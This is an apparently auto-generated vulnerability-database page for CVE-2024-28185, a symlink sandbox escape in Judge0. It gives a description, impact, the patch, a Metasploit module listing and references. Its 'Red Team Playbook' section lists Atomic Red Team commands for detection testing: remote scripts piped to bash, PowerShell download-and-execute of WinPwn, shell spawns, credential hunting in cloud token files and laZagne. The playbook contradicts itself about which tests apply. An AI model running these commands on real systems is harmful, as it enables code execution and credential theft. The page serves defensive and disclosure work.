CVE-2024-28185
Overview
This vulnerability is a symbolic link (symlink) attack vulnerability affecting Judge0's sandbox directory handling. The root cause is the failure to validate or restrict symlinks within the sandbox, allowing an attacker to replace expected files with symlinks. Specifically, the component responsible for writing the run_script file in the sandbox directory does not verify the file path, enabling arbitrary file writes outside the sandbox environment.
Vulnerability Description
Judge0 is an open-source online code execution system. The application does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox. When executing a submission, Judge0 writes a `run_script` to the sandbox directory. The security issue is that an attacker can create a symbolic link (symlink) at the path `run_script` before this code is executed, resulting in the `f.write` writing to an arbitrary file on the unsandboxed system. An attacker can leverage this vulnerability to overwrite scripts on the system and gain code execution outside of the sandbox.
Impact
An unauthenticated attacker with the ability to submit code to Judge0 can exploit this vulnerability to overwrite arbitrary files on the host system, including critical scripts. This enables full code execution outside the sandbox, compromising the host environment. Since no privileges or user interaction are required, the attack can be performed remotely via the code submission interface. The CVSS vector AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H reflects the high severity and ease of exploitation, potentially leading to complete system compromise and data integrity loss.
Solution
Apply the patch provided in Judge0 version 1.13.0 or later, which includes validation to prevent symlink exploitation in the sandbox directory. Refer to the GitHub security advisory GHSA-h9g2-45c8-89cf and the commit 846d5839026161bb299b7a35fd3b2afb107992fc for detailed remediation steps. Users should update their installations accordingly to eliminate the symlink vulnerability in the run_script handling logic.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the open-source online code execution system, Judge0, arises from its inadequate handling of symbolic links within the sandbox directory. When a user submits code for execution, the application generates a `run_script` file in the sandbox. However, the absence of checks for symlinks allows an attacker to create a symbolic link at the `run_script` path prior to execution. Consequently, when the application attempts to write to this file, it inadvertently writes to the target of the symlink instead. This oversight can lead to unauthorized file modifications on the host system, effectively bypassing the intended isolation of the sandbox environment.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could submit malicious code designed to create a symlink pointing to sensitive files or system scripts. Once the symlink is established, the subsequent execution of the `run_script` would result in the attacker gaining the ability to overwrite critical files or execute arbitrary code on the host system. This could lead to a range of malicious activities, from data exfiltration to the installation of persistent backdoors, thereby compromising the integrity and confidentiality of the system.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on Judge0 for executing untrusted code. The potential for an attacker to gain code execution outside of the sandbox poses severe risks, including unauthorized access to sensitive data, disruption of services, and damage to the organization's reputation. Businesses that utilize this system may face regulatory scrutiny, financial losses, and a loss of customer trust if their systems are compromised due to this vulnerability. The critical nature of this flaw, indicated by its maximum CVSS score, underscores the urgency for organizations to address this issue promptly.
To detect and mitigate the risks associated with this vulnerability, organizations should implement several strategies. First, it is crucial to conduct a thorough audit of the code execution environment to identify any existing symlinks within the sandbox directory. Additionally, applying strict validation checks on file paths and ensuring that symbolic links are not permitted in the sandbox can significantly reduce the attack surface. Employing a principle of least privilege for the execution environment, along with regular updates and patches to the Judge0 application, will further enhance security. Organizations should also consider employing intrusion detection systems (IDS) to monitor for unusual file access patterns that may indicate exploitation attempts.
In conclusion, the vulnerability within Judge0 represents a critical security flaw that can lead to severe consequences if left unaddressed. By understanding the technical details, potential attack vectors, and real-world implications, organizations can better prepare to defend against such threats. Proactive detection and mitigation strategies are essential to safeguard systems that rely on code execution environments, ensuring that they remain secure against emerging vulnerabilities.
Affected Products
No CPE information available.
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Judge0 sandbox escape
exploits/linux/http/judge0_sandbox_escape_cve_2024_28189
|
Tanto Security, Takahiro Yokoyama | Unknown | unix, linux | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-28185 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/judge0/judge0/security/advisories/GHSA-h9g2-45c8-89cf |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/judge0/judge0/commit/846d5839026161bb299b7a35fd3b2afb107992fc |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/judge0/judge0/blob/v1.13.0/app/jobs/isolate_job.rb#L197-L201 |